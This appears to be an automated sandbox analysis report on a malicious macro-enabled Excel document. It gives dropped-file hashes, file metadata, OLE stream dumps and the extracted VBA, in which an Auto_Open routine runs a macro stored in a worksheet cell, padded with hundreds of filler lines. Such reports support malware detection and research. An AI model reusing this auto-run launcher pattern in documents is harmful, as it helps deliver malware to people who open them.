.COPY-3~1.XLS..f.......Q.y.Q.y*...8.....................C.o.p.y.-.3.8.4.9.5.5.7.9.9.-.0.5.1.0.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\Copy-384955799-05102021.xlsm.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.p.y.-.3.8.4.9.5.5.7.9.9.-.0.5.1.0.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 18:45:42 2021, atime=Wed May 12 18:45:42 2021, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.482865332269327
    Encrypted:false
    SSDEEP:12:85QjLgXg/XAlCPCHaXtB8XzB/dPgX+WnicvbVbDtZ3YilMMEpxRljKVTdJP9TdJ2:85U/XTd6jnIYeFDv3q8rNru/
    MD5:6A2FAE1BEE6B1AA81289E4CDD3AA31BB
    SHA1:17A56D0FD49AA1EA03157C2D94EDA8389A6B6C0E
    SHA-256:6BE5963E82D011259515D7DDEE538E302E6513DA8C96A2667B6C9929ED9EFAB0
    SHA-512:CED1B029B6E605483D916EB9CCB1D385E70BDE7665F4821366A9983E39ACAE119D3D657079C33D40D31BAD16CC99745E251D8A8D599F524F54A9326AD1B69001
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G..1.fdgG..1.fdgG... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):124
    Entropy (8bit):4.68002329507579
    Encrypted:false
    SSDEEP:3:oyBVomxWtzIacotoQkrl+kacotoQkrlmxWtzIacotoQkrlv:djezIaco+Qkrzaco+QkrzzIaco+Qkr1
    MD5:438B9CB10BCA95DD0FEF5F9FB33DBE7F
    SHA1:A4F06BC314BDFB4B654D357BA215346E14DAD351
    SHA-256:2E405053595AE39D699D09BFB5752DDC1E1531D930D812E9C4455A552579E3BF
    SHA-512:28833687FED53233B7D18FEF346E36381B61246B2CC4F18A427E9C8C446A6128F0C04405421BA122F57D362521E9588CFDD1F0D2830E3D1FDC2CC3EABA483828
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[misc]..Copy-384955799-05102021.LNK=0..Copy-384955799-05102021.LNK=0..[misc]..Copy-384955799-05102021.LNK=0..
    C:\Users\user\Desktop\7EDE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):118890
    Entropy (8bit):7.68962937965185
    Encrypted:false
    SSDEEP:3072:ExFcKwLsvKINbjvw548LMb/oqKO8NnS8+60KcFffd:wTwLhAbT648LM7D98Np+ECF
    MD5:7A2EB52E11A0B4D4B1F7F2BD015660ED
    SHA1:229AE31810B52AC5729A5198211F330DAD91BB84
    SHA-256:30382D567139C142CCD257D904C5304706F50DF1547E38689B9FA19C5F346FFC
    SHA-512:20BBF98FEF0B2A559630C62DB649FC250459E82F40795437DEFE06C0213AE18397C02D56F6C77B83E845E4CE81109D568B67E31FA3C50E3B3EF56BEA7287D659
    Malicious:false
    Reputation:low
    Preview: .V]o.0.}.....u.M;i.&B...........%...w.(...)..|9..s?.....b.!*g+rA...+.T.....?.OR....Y..."..}.2|\z..F.X.&%...(.0<R..........y.f..v9..`...6.)c...7L..N........%...LU..V.'...V.n2Q...O..i.....@2....1<@J.X$l/g................~.!....p...;q..jN=...;....t....-4{va6vnF...j.X.B..m..".....p.+.....62..tq...)9...I..S..'....t.}...,l.;.}q..S..&....=.?`-LG^1-5.w.........C..~w..cw.?g.l}q~..@=yO......x..pO..}pS..v[.~9+...C6....>....?./...K.@.......#:v......K A..f./..........PK..........!.\..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\Desktop\~$Copy-384955799-05102021.xlsm
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:true
    Reputation:high, very likely benign file
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.687004388058775
    TrID:
    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
    • ZIP compressed archive (8000/1) 7.58%
    File name:Copy-384955799-05102021.xlsm
    File size:117551
    MD5:3a3aae5975bd4a5512cfea2a4a5991a6
    SHA1:4ff9eafa51cdd8d979ef68dc8d0aa9ebb6168e20
    SHA256:bba463e9f1b1044f7d3b09fe0d696ebb57b1668a1fc025363731c6aefac112bd
    SHA512:4520dd5fc814372d5a76ef77376293fb5b562f2543a315ac567b1f24fcdb7da89b63da29004c2f0199e249f9319bf88945c1fd51bf40cfd3c0ef09dcf40b0d1f
    SSDEEP:3072:0f/vKINbjvw548LMb/oqKO8NnS8+60Kcdb:0faAbT648LM7D98Np+E8
    File Content Preview:PK..........!. +F.............[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4bcbcac

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/412131/sample/Copy-384955799-05102021.xlsm"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Author:Rabota
    Last Saved By:Brifes
    Create Time:2015-06-05T18:19:34Z
    Last Saved Time:2021-05-10T15:19:38Z
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:16.0300

    Streams with VBA

    VBA File Name: dfgbfdg.bas, Stream Size: 12783
    General
    Stream Path:VBA/dfgbfdg
    VBA File Name:dfgbfdg.bas
    Stream Size:12783
    Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 2c 00 00 00 00 00 00 01 00 00 00 92 bf 61 d3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Application.Run
    Attribute
    Auto_Open()
    "dfgbfdg"
    Application.WindowState
    VB_Name
    Private
    xlMaximized
    VBA Code
    Attribute VB_Name = "dfgbfdg"
    Private Sub Auto_Open()
    Application.Run Sheets("Klof").Range("AJ6")
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
      Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
     Application.WindowState = xlMaximized
    End Sub
    VBA File Name: gdrgdrzg.bas, Stream Size: 681
    General
    Stream Path:VBA/gdrgdrzg
    VBA File Name:gdrgdrzg.bas
    Stream Size:681
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf 91 ff 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    VB_Name
    "gdrgdrzg"
    VBA Code
    Attribute VB_Name = "gdrgdrzg"
    VBA File Name: rgtrdsgrd.bas, Stream Size: 684
    General
    Stream Path:VBA/rgtrdsgrd
    VBA File Name:rgtrdsgrd.bas
    Stream Size:684
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf 1e ac 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    "rgtrdsgrd"
    VB_Name
    VBA Code
    Attribute VB_Name = "rgtrdsgrd"
    VBA File Name: sefsef.bas, Stream Size: 679
    General
    Stream Path:VBA/sefsef
    VBA File Name:sefsef.bas
    Stream Size:679
    Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 92 bf bf ee 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    Attribute
    VB_Name
    "sefsef"
    VBA Code
    Attribute VB_Name = "sefsef"

    Streams

    Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 651
    General
    Stream Path:PROJECT
    File Type:ISO-8859 text, with CRLF line terminators
    Stream Size:651
    Entropy:5.48218564538
    Base64 Encoded:True
    Data ASCII:I D = " { 5 9 C 1 B 9 2 7 - 2 6 4 8 - 4 7 3 B - 8 5 A B - A F 8 5 5 3 3 B 3 C 8 D } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = d f g b f d g . . M o d u l e = s e f s e f . . M o d u l e = r g t r d s g r d . . M o d u l e = g d r g d r z g . . D o c u m e n t = . . . . 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = "
    Data Raw:49 44 3d 22 7b 35 39 43 31 42 39 32 37 2d 32 36 34 38 2d 34 37 33 42 2d 38 35 41 42 2d 41 46 38 35 35 33 33 42 33 43 38 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 64 66 67 62 66 64 67 0d 0a 4d 6f 64 75 6c 65 3d 73 65 66
    Stream Path: PROJECTwm, File Type: data, Stream Size: 185
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:185
    Entropy:3.85386516759
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . d f g b f d g . d . f . g . b . f . d . g . . . s e f s e f . s . e . f . s . e . f . . . r g t r d s g r d . r . g . t . r . d . s . g . r . d . . . g d r g d r z g . g . d . r . g . d . r . z . g . . . . . . . 2 . . . 8 . A . B . 2 . . . . . . . 3 . . . 8 . A . B . 3 . . . . .
    Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 64 66 67 62 66 64 67 00 64 00 66 00 67 00 62 00 66 00 64 00 67 00 00 00 73 65 66 73 65 66 00 73 00 65 00 66 00 73 00 65 00 66 00 00 00 72 67 74 72 64 73 67 72 64 00 72 00 67 00 74 00 72 00 64 00 73 00 67 00 72 00 64 00 00 00 67 64 72 67 64 72 7a 67
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3331
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:3331
    Entropy:4.29605456718
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
